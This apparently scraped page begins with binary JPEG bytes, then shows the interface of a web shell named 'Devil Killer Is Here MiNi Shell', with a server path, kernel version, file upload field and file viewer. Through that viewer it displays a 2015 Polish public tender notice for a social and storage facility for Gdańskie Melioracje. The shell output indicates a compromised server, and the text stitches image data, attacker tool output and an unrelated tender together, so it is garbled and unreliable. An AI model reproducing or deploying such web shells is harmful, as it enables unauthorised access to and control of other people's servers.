JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151201/176421-N-2015.html

<p class="kh_header"><b>Gdańsk: BUDOWA ZAPLECZA SOCJALNO-MAGAZYNOWEGO 
DLA GDAŃSKICH MELIORACJI SP. Z O.O.</b><br>
<b>Numer ogłoszenia: 176421 - 2015; data zamieszczenia: 01.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Gdańskie Melioracje" Spółka z o.o. , ul. Łąkowa 35/38, 80-743 Gdańsk, woj. pomorskie, tel. 058 3233400, faks 058 3012458.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdmel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA ZAPLECZA SOCJALNO-MAGAZYNOWEGO 
DLA GDAŃSKICH MELIORACJI SP. Z O.O..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nazwa zamówienia.
Kompleksowe wykonanie robót budowlano - montażowych dla zadania: Budowa zaplecza socjalno-magazynowego dla Gdańskich Melioracji Sp. z o.o.
2.	Krótki opis przedmiotu zamówienia.
Przedmiotem zamówienia jest kompleksowa realizacja robót budowlano - montażowych, w tym uzyskanie wszelkich niezbędnych uzgodnień i zgód administracyjnych lub ich aktualizacji oraz uzyskanie pozwolenia na użytkowanie dla zadania: Budowa zaplecza socjalno-magazynowego dla Gdańskich Melioracji Sp. z o.o.
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robot budowlanych (STWiORB) - załącznik nr 10 do SIWZ.
3.	Zakres przedmiotu zamówienia
Zakres rzeczowy robót obejmuje: 
ROBOTY PRZYGOTOWAWCZE
I.1.	Roboty rozbiórkowe - budynek, istniejące drogi, ogrodzenie, fundamenty- kolidujące z realizowanymi robotami 
I.2.	Zieleń kolidująca - wycinka
I.3.	Rozbiórka kolidujących istniejących sieci uzbrojenia terenu
BUDOWLANE i INSTALACYJNE - Budynek socjalno-biurowy
II	Fundamenty 
II.1	Roboty ziemne, wymiana gruntu i rekultywacja 
II.2	Odwodnienie i umocnienie wykopu 
II.4	Wykonanie fundamentów
III	KONSTRUKCJA I WYKOŃCZENIE BUDYNKU
III.1	Konstrukcja stanu surowego /otwartego/
III.2	Stan surowy zamknięty
III.3	Elewacje i okładziny 
III.4	Stan wykończeniowy - roboty wewnętrzne
IV	INSTALACJE WEWNĘTRZNE
IV.1	Instalacje wewnętrzne elektryczne
IV.2	Instalacje wewnętrzne sanitarne
IV.3	Instalacje teletechniczne
ROBOTY BUDOWLANE I INSTALACYJNE - Budynek magazynowy
II	Fundamenty 
II.1	Roboty ziemne, wymiana gruntu i rekultywacja 
II.2	Odwodnienie i umocnienie wykopu 
II.4	Wykonanie fundamentów
III	KONSTRUKCJA I WYKOŃCZENIE BUDYNKU
III.1	Konstrukcja stanu surowego otwartego
III.2	Stan surowy zamknięty
III.3	Elewacje i okładziny 
III.4	Stan wykończeniowy - roboty wewnętrzne
IV	INSTALACJE WEWNĘTRZNE
IV.1	Instalacje wewnętrzne elektryczne
IV.2	Instalacje wewnętrzne sanitarne
IV.3	Instalacje teletechniczne
ROBOTY ZEWNĘTRZNE
V.1	Instalacje elektryczne zewnętrzne 
V.2	Instalacje co zewnętrzne (prowadzenie przewodów wody zimnej, wody ciepłej, cyrkulacji centralnego ogrzewania i instalacji glikolu do i z kotłowni olejowej) 
V.3	Instalacje teletechniczne zewnętrzne 
W zakres zamówienia nie wchodzą następujące zakresy robót objęte odrębną dokumentacją projektową:
-	budowa dróg i nawierzchni objęta Projektem Zagospodarowaniem Terenu, branża Drogi,
-	przyłącza i instalacje zewnętrzne wody, kanalizacji sanitarnej i deszczowej objęte Projektem Budowlanym przyłączy i instalacji zewnętrznych wodociągowych, kanalizacji sanitarnej i deszczowej.
Do obowiązków Wykonawcy budowy obiektu będzie należała koordynacja prac Wykonawców zakresów wskazanych powyżej w sposób umożliwiający terminowe zakończenie robót. Wykonawca winien w swojej ofercie uwzględnić koszty wynikające z koordynacji prac tych Wykonawców. 
4.	Ogólny opis zadania inwestycyjnego.
Zaplecze socjalno-magazynowe składa się z dwóch budynków socjalno - biurowego i magazynowego oraz zagospodarowania terenu w postaci dróg dojazdowych, parkingu dla samochodów osobowych i placu manewrowego. 
Budynek socjalno - biurowy zaprojektowano, jako obiekt dwukondygnacyjny niepodpiwniczony z częścią socjalną na parterze i funkcją biurową na I piętrze. Konstrukcja w postaci szkieletu żelbetowego prefabrykowanego (układ nieprzesuwny). Ustrój nośny tworzą prefabrykowane sprężone belki dachowe wsparte przegubowo na prefabrykowanych żelbetowych słupach. Stropy zaprojektowano jako żelbetowe prefabrykowane z płyt sprężonych. Płyty oparte są na belkach prefabrykowanych sprężonych. Na każdej kondygnacji przewidziano belki obwodowe prefabrykowane pełniące jednocześnie rolę nadproży okiennych. 
Konstrukcja jest usztywniona za pomocą ścian żelbetowych prefabrykowanych. Klatki schodowe wraz z biegami i spocznikami wykonane zostaną w technologii monolitycznej. Część ścian klatek schodowych wykonane, jako ściany usztywniające prefabrykowane. Wypełnienie ścian zewnętrznych bloczkami drobnowymiarowymi z gazobetonu, ściany wewnętrzne z pustaków ceramicznych. Fundamenty zaprojektowano, jako żelbetowe monolityczne.	
Budynek magazynowy składa się z magazynu przeciwpowodziowego, warsztatu naprawczego sprzętu własnego oraz garażu dla posiadanego sprzętu zmechanizowanego. Ponadto w budynku magazynowym znajdują się sanitariaty dla pracowników magazynu oraz kotłownia olejowa obsługująca całe zaplecze.
Konstrukcję budynku zaprojektowano w postaci hali o konstrukcji stalowej jednonawowej o rozpiętości 12m.
Posadowienie przewidziano na stopach fundamentowych. Główne elementy konstrukcji hali są wykonane ze stali ocynkowanej na gorąco. Strop antresoli z płyty żelbetowej wsparto na słupkach wykonanych ze stali gorącowalcowanej i belkach stropowych ze stali ocynkowanej na gorąco. Zakładana nośność antresoli 3,50kN/m2. Ściany konstrukcyjne i osłonowe hali magazynowej przewidziano z płyt warstwowych w układzie poziomym z rdzeniem z poliuretanu. Hala pokryta jest blachą stalową trapezową galwanizowaną, dachu jednospadowy.
Dla zaplecza przewidziano następujące przyłącza:
-	wodociągowe z nowo wybudowanego  wodociągu w ul. Kaczeńce,
-	kanalizacji sanitarnej z nowo wybudowanego kolektora sanitarnego w ul. Kaczeńce, 
-	kanalizacji deszczowej z odprowadzeniem do rowu melioracyjnego,
-	energetyczne, które będzie wykonane przez przedsiębiorstw energetyczne - Energa Operatora S.A. na podstawie zawartej umowy przyłączeniowej.
W obszarze lokalizacji występuje uzbrojenie terenu przewidziane do przełożenia lub likwidacji.
5.	Obowiązki Wykonawcy i warunki wykonywania robót.
Wykonawca w ramach przedmiotu zamówienia jest zobowiązany do realizacji w szczególności następujących obowiązków oraz uwzględnienia następujących warunków lub zaleceń:
1)	Realizacji przedmiotu zamówienia zgodnie z zakresem przedstawionym w dokumentacji projektowej budowlano - wykonawczej, wiedzą techniczną, decyzjami organów administracji, zaleceniami jednostek uzgadniających, obowiązującymi normami technicznymi oraz wymogami SIWZ i Umowy;
2)	Dokonania aktualizacji wszelkich uzgodnień, pozwoleń, zgód i decyzji administracyjnych - jeżeli zajdzie taka konieczność;
3)	Opracowania planu bezpieczeństwa i ochrony zdrowia (BIOZ) uwzględniając specyfikę robót i inwestycji oraz warunki prowadzenia robót i przestrzegania zasad określonych w Wymaganiach dotyczących bezpieczeństwa i higieny pracy, stanowiących załącznik nr 12 do SIWZ;
4)	Opracowania dokumentacji technologiczno-warsztatowej, która będzie stanowić uszczegółowienie przyjętych przez projektanta rozwiązań technicznych ze szczególnym uwzględnieniem wymagań technologii własnej Wykonawcy. Wskazana dokumentacja każdorazowo wymaga pisemnej akceptacji projektanta;
5)	Wykonania Projektu Organizacji Ruchu na czas prowadzenia robót;
6)	Wykonania oświetlenia terenu lokalizacji;
7)	Zapewnienia zaplecza budowy wraz z miejscami parkingowymi dla samochodów osobowych do dyspozycji  Zamawiającego i osób wskazanych przez Zamawiającego zgodnie z wymogami zawartymi w załączniku nr 11. Po zakończeniu robót, przez Wykonawcę zaplecze należy zlikwidować;
8)	Wykonania i utrzymania tymczasowych dróg dojazdowych;
9)	Zaleca się dokonanie wizji w terenie celem sprawdzenia aktualnych warunków terenowych, w tym stanu istniejących obiektów oraz warunków związanych z wykonaniem robót będących przedmiotem zamówienia;
10)	Prowadzenia dokumentacji budowy zgodnie z przepisami prawa budowlanego;
11)	Zajęcia i zagospodarowania terenu związanego z potrzebami budowy, zorganizowania zaplecza budowy łącznie z zabezpieczeniem dostaw wody, energii elektrycznej oraz łączności telefonicznej na terenie budowy stosownie do potrzeb własnych;
12)	Zamontowania i demontażu, po zakończeniu eksploatacji, na własny koszt liczników zużycia wody i energii elektrycznej oraz ponoszenia kosztów zużycia tych czynników w okresie od przekazania placu budowy do odbioru końcowego robót przez Zamawiającego;
13)	Oznakowania terenu budowy zgodnie z wymogami i zabezpieczenia go zgodnie z przepisami BHP i ppoż. oraz pokrycia kosztów wszystkich robót i czynności związanych z wdrożeniem zaleceń z tym związanych;
14)	Wykonawca będzie odpowiedzialny za uszkodzenie uzbrojenia terenu i istniejących urządzeń budowlanych oraz za wszelkie następstwa zdarzeń dotyczących terenu lokalizacji budowy;
15)	Wykonania badań zagęszczenia gruntu, zapewnienia pełnej obsługi geodezyjnej łącznie z określaniem współrzędnych, oraz wykonania inwentaryzacji powykonawczej. Zamawiający lub Inżynier Kontraktu ma prawo żądać inwentaryzacji geodezyjnej/operatu geodezyjnego na każdym etapie realizacji przedmiotu Umowy;
16)	Realizacji inwestycji zgodnie z opinią Referatu Koordynacji Sytuowania Projektowanego Uzbrojenia Terenu i innych instytucji - gestorów sieci;
17)	Ochrony instalacji na powierzchni ziemi i urządzeń podziemne takie jak kable, rurociągi itp. oraz uzyskania od odpowiednich władz będących właścicielem tych urządzeń potwierdzenia informacji dostarczonych mu przez Zamawiającego w ramach lokalizacji wykazanych na planszy uzbrojenia. Wykonawca zapewni właściwe oznaczenie i zabezpieczenie tych instalacji i urządzeń w czasie trwania budowy;
18)	Wykonania  rozruchów technologicznych;
19)	Wykonanie prób eksploatacyjnych wskazanych przez Inżyniera Kontraktu instalacji;
20)	Zapewnienia i pokrycia kosztu nadzorów technicznych prowadzonych przez przedstawicieli instytucji, które przejmują  na majątek  wybudowane elementy;
21)	Wykonania geodezyjnej inwentaryzacji powykonawczej i dokumentacji geodezyjno-kartograficznej zawierającej dane umożliwiające wniesienie zmian na mapę zasadniczą, do ewidencji gruntów oraz do ewidencji sieci uzbrojenia;
22)	Prowadzenia gospodarki odpadami zgodnie z ustawą z 14.12.2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późniejszymi zmianami);
23)	Zapewnienia stałego dostępu do posesji sąsiadujących z placem budowy przez cały okres trwania robót;
24)	Wykonania robót z materiałów własnych, które odpowiadają jakościowo wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonym w art. 10 ustawy z 07.07.1994r. Prawo Budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zmianami) i wymogom przewidzianym w SIWZ;
25)	Wykonania w pięciu egzemplarzach budowlanej dokumentacji powykonawczej oraz wersji elektronicznej zgodnie z obowiązującymi przepisami oraz przekazania  informacji niezbędnych do wystawienia dokumentów przejęcia środków trwałych;
26)	Uporządkowania terenów sąsiednich po zakończeniu robót;
27)	Dostarczenia charakterystyki energetycznej wykonanego obiektu;
28)	Dostarczenia instrukcji bezpieczeństwa ppoż. obiektu;
29)	Dostarczenia instrukcji użytkowania i eksploatacji obiektu - instrukcje obsługi wszelkich systemów i urządzeń niezbędnych do prawidłowego funkcjonowania i użytkowania obiektu wraz z wykazem wbudowanych urządzeń, które wymagają przeglądów serwisowych, wraz z kartami gwarancyjnym producentów ww. systemów i urządzeń;
30)	Przygotowania wszelkich dokumentów wymaganych do uzyskania pozwolenia na użytkowanie obiektu i uzyskanie pozwolenia na użytkowanie;
6.	Dokumenty Wykonawcy i zezwolenia do uzyskania przez Wykonawcę
a)	Projekt obsługi transportowej placu budowy dla wszystkich etapów realizacji robót;
b)	Projekty powykonawcze wraz z kompletem inwentaryzacji geodezyjnych powykonawczych;
c)	Projekt ogrodzenia terenu budowy i tablic informacyjnych,
d)	Zezwolenie do zajęcia terenu chodników na okres prowadzenia prac,
e)	Zezwolenie na składowanie gruntu z wykopu,
f)	Zezwolenie na utylizację odpadów.
7.	Dokumenty pozyskane przez Zamawiającego 
a)	Decyzja Wojewody Pomorskiego o zatwierdzeniu projektu budowlanego i pozwoleniu na budowę - w trakcie procedowania
b)	Opinia Referatu Koordynacji Sytuowania Projektowanego Uzbrojenia Terenu nr WG-IV.6630.655.2015.AJ z dnia 11.09.2015 r.
c)	Pozwolenia wodnoprawne nr DROŚ-SW.7322.157.2015/ŁP z 24.11.2015 r.
d)	Umowa o przyłączenie do sieci elektroenergetycznej Energa - Operator SA nr P/15/001739 z dnia 26.05.2015 r.
e)	Uzgodnienie Zarządu Portu Gdańsk nr IS-265/361/15 z dnia 25.08.2015 r.
f)	Decyzja Dyrektora Regionalnego Zarządu Gospodarki Wodnej zwalniająca od ogólnych zakazów inwestowania na obszarach szczególnego zagrożenia powodzią nr ZW-172/88/88I/2015 znak ZPU/71-129/88I/05/2015/ks z dnia 14.09.2015 r. 
g)	Uzgodnienia gestorów sieci i infrastruktury
1)	Przyłącze wodociągowe i kanalizacji sanitarnej
Warunki techniczne przyłączenia nr W-T/503/2014/EP wydane przez GIWK
Warunki techniczne przyłączenia nr W-T/312/2015/EP (uzupełnienie poprzednich WT) wydane przez GIWK
Uzgodnienie GIWK nr UD-613/2015 z dnia 04.08.2015 r.
Uzgodnienie GARG jako właściciela sieci kanalizacji sanitarnej w ul. Kaczeńce z dnia 20.07.2015 r.
Decyzja ZDiZ-ZD-6320-615(2)-2015-EZ-2664 z dnia 28.07.2015 r.
2)	Przyłącze kanalizacji deszczowej
Warunki techniczne przyłączenia nr NT. U-WT-1322/1105/2015 z dnia 25.05.2015 r. wydane przez Gdańskie Melioracje Sp. z o.o.
Uzgodnienie nr 1257/2015 z dnia 07.08.2015 r. wydane przez Gdańskie Melioracje Sp. z o.o.
3)	Przyłącze elektroenergetyczne (projekt przyłącza zgłasza ENERGA)
Warunki techniczne nr P/15/001739 z dnia 29.01.2015 r.
Warunki techniczne nr P/15/024830 z dnia 16.07.2015 r.
8.	Wspólny Słownik Zamówień (CPV)
Dział:
45.00.00.00-7	Roboty budowlane
Grupa:
45.20.00.00-9	Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
Klasyfikacja:
45.21.00.00-2	Roboty budowlane w zakresie budynków
45.21.32.52-4	Roboty budowlane w zakresie warsztatów
45.21.32.21-8	Roboty budowlane w zakresie budowy magazynów
45.21.34.00-7	Instalowanie pomieszczeń dla personelu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 150 000,00 zł. 
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego o numerze: Bank Millennium 13116022020000000061901799 
z oznaczeniem: Wadium - Sygnatura Akt ZP-07/PN/2015.
5. Wadium w formach niegotówkowych należy złożyć w siedzibie Spółki Gdańskie Melioracje Sp. z o.o. w Gdańsku, ul. Prof. Witolda Andruszkiewicza 5, 80 - 601 Gdańsk, z oznaczeniem - Wadium: Kompleksowe wykonanie robót budowlano - montażowych dla zadania: Budowa zaplecza socjalno-magazynowego dla Gdańskich Melioracji Sp. z o.o., Sygnatura Akt ZP-07/PN/2015.
6. Wadium w formach niegotówkowych musi wskazywać, jako beneficjenta Zamawiającego.
7. Wadium w formie poręczeń lub gwarancji musi gwarantować Zamawiającemu bezwarunkową wypłatę na jego pierwsze pisemne żądanie kwoty wadium w przypadkach określonych w art. 46 ust. 4a oraz ust. 5 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907, z późn. zm.), bez jakichkolwiek dodatkowych zastrzeżeń i warunków. Poręczenia i gwarancje muszą być ważne, co najmniej przez okres związania ofertą, a w przypadku przedłużenia terminu związania ofertą - także przez ten okres.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy, w szczególności w zakresie posiadania wiedzy i doświadczenia - w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli:
a)	co najmniej jedno zamówienie polegające na budowie obiektów kubaturowych o łącznej kubaturze nie mniejszej niż 13 000 m3 i minimalnej wartości robót budowlano-montażowych - 6 000 000 zł netto, w tym budynku wyposażonego w instalację wodociągową, kanalizacyjną, ogrzewczą i instalację wentylacyjną lub klimatyzacyjna, oraz 
b)	co najmniej jedno zamówienie polegające na budowie budynku o konstrukcji stalowej o kubaturze co najmniej 6000 m3.
Warunek zostanie uznany za spełniony także w sytuacji, gdy jedno zamówienie obejmować będzie wymagania opisane w podpunktach a) i b) powyżej.
Ocena spełniania warunków, o których mowa w art. 22 ust. 1 ustawy, dokonywana będzie na podstawie dokumentów wymienionych w pkt VI.1.1) SIWZ i pkt III.4.1) ogłoszenia o zamówieniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy, w szczególności w zakresie dysponowania osobami zdolnymi do wykonania zamówienia - dysponuje osobą na stanowisko Przedstawiciela Wykonawcy Kierownika Budowy, posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej przez okres co najmniej 3 lat oraz posiadającą doświadczenie zawodowe jako kierownik budowy przy budowie obiektu kubaturowego o wartości netto robót budowlano-montażowych co najmniej 6 000 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy, w szczególności w zakresie sytuacji finansowej - posiadają środki finansowe na rachunku w banku lub spółdzielczej kasie oszczędnościowo-kredytowej lub zdolność kredytową w wysokości co najmniej 3.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

